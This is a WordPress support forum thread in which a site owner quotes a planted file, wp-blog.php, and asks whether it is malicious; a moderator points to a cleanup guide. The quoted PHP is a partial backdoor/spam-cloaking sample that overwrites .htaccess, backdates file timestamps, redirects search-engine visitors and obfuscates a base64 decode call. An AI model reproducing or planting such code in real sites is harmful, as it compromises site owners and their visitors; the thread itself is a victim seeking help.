Strange file

  • Resolved mgc

    (@mgc)


    5 years, 1 month ago

    I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:

    @ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
	$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
	touch('.htaccess', $actime);
	touch('wp-blog.php', $actime);
	echo 'ok';
}
exit;
}

if (is_dir("wp-includes/Text/Diff/p")) {
	$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";

$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];

$redirect = 0;
$fof = '404 not found';

function getRealIpAddr() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];

if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;

$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";

if (ini_get('allow_url_fopen')) {
    function get_data_ya($mmm) {
        $data = file_get_contents($mmm);
        return $data;
    }
}

    There’s more, but this part looks like it’s doing something suspicious.

    I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter mgc

    (@mgc)

    Hi Parrotlover and Steve,

    Thank you for confirming this. I’ve installed some reputable security plugins, run some external scans, and spent a few hours now combing through all the folders looking for anything that looks even remotely suspicious.

    I greatly appreciate your feedback and suggestions!

    Cheers,
    Michael

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Strange file’ is closed to new replies.